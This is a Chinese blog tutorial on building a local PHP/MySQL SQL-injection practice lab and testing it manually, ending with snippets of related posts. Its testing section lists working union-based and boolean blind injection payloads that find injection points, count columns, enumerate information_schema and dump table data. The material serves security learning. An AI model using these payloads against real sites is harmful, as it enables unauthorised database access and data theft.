php mysql注入環境搭建

2021-08-18 19:53:18 字數 2861 閱讀 7967

php+mysql注入環境搭建需要資料如下:

1.安裝phpmystudy

自定義安裝好phpmystudy,啟動(執行phpmystudy)

在phpmystudy安裝路徑下www目錄建立一下資料夾test,

3.資料接受(建立資料庫,注入傳遞引數到資料庫)

使用者名稱密碼都是root

建立乙個表列資料,接受傳遞引數查詢資料庫。(我這裡直接下資料庫test下,建立一張biao表)

create table if not exists `biao` (

`id` int(10) not null,

`title` varchar(1000) not null,

`text` varchar(1000) not null

) engine=myisam default charset=gbk;

insert into `biao` (`id`, `title`, `text`) values

(1,'滲透注入','本地搭建注入環境')

好了,到此php+mysql注入環境搭建完成。

測試:

傳遞的引數?i=1

第一步:判斷環境,尋找注入點

確定注入點 : 

數字型:   用'號報錯 就有注入的希望     或者 and 1=1  and 1=2 檢測  乙個正常 乙個返回不正常 95%存在注入點用 

猜解當前字段數: and  1=1  order by 3  (3正常,4不正常,欄位數為3)

warming: order by 語句僅用於猜解當前查詢語句查詢的字段數(即if 為 * ,則查詢所有。為name,則只查詢乙個name欄位)

輸出資料類容判斷字段位置:and 1=1  union select 1,2,3(字段個數)

注:union查詢,必須兩次查詢的結果格式相同;

注:mysql注入不需要猜測表名5.*版本以上,

因為存在mysql-information_schema資訊資料庫,即元資料,裡面含有資料庫的基本資訊;

獲取資料庫資訊:

資料庫名 database()

資料庫版本 version()

資料庫使用者 user()

作業系統 @@version_compile_os

得到資料庫為test,使用者為root,資料庫版本5.5.47

查詢test(使用小葵多功能轉換工具得到hex編碼)下的所有表名資訊:

注:mysql注入不需要猜測表名5.*版本以上,

因為存在mysql-information_schema資訊資料庫,即元資料,裡面含有資料庫的基本資訊;

查詢biao(使用小葵多功能轉換工具得到hex編碼)下的所有列名資訊:

and 1=1  union select column_name,2,3 from information_schema.columns where table_name=0x6269616f(限制表名,因為存在多個表)

直接獲取biao表名下的title列名的資料:

and 1=1  union select title,2,3 from test.biao

and left((select table_name from information_schema.tables where table_schema=database()limit 0,1),1)='b'

總結:應該依次查詢出字端數然後以此聯合查詢庫名、表名(nformation_schema.tables)、欄位名(information_schema.columns)從information_schema元資料中,但因存在多表、多庫,必須限定查詢;其次在根據表名查詢相關欄位下的資訊;

php mysql注入環境搭建及測試 上)

php mysql注入環境搭建需要資料如下 1.安裝phpmystudy 自定義安裝好phpmystudy,啟動 執行phpmystudy 在phpmystudy安裝路徑下www目錄建立一下資料夾test,3.資料接受 建立資料庫,注入傳遞引數到資料庫 使用者名稱密碼都是root 建立乙個表列資料,...

PHP mySQL環境一鍵搭建

最近的工作中經常涉及重複的填寫 內容大同小異,無非是編號的變化 部分內容的變化,有些東西是可以自動生成的,所以決定用php mysql實現這個小功能,每次只填寫必填項,就可以自動生成複雜的 當然第一步,需要搭建php和mysql環境。安裝完成後,會提示論壇賬號密碼和mysql賬號密碼,我們用到的只有...

SQL注入環境的搭建

使用phpstudy搭建sql注入環境 所用環境的 是乙個印度人的開源專案平台。裡面包含了基本的各種注入型別,同時又有get和post型別,以及一些基本的繞過學習。可以直接zip壓縮包好一點 3.sqli labs master解壓到你的phpstudy安裝目錄裡面的www目錄下 4.開啟sqli ...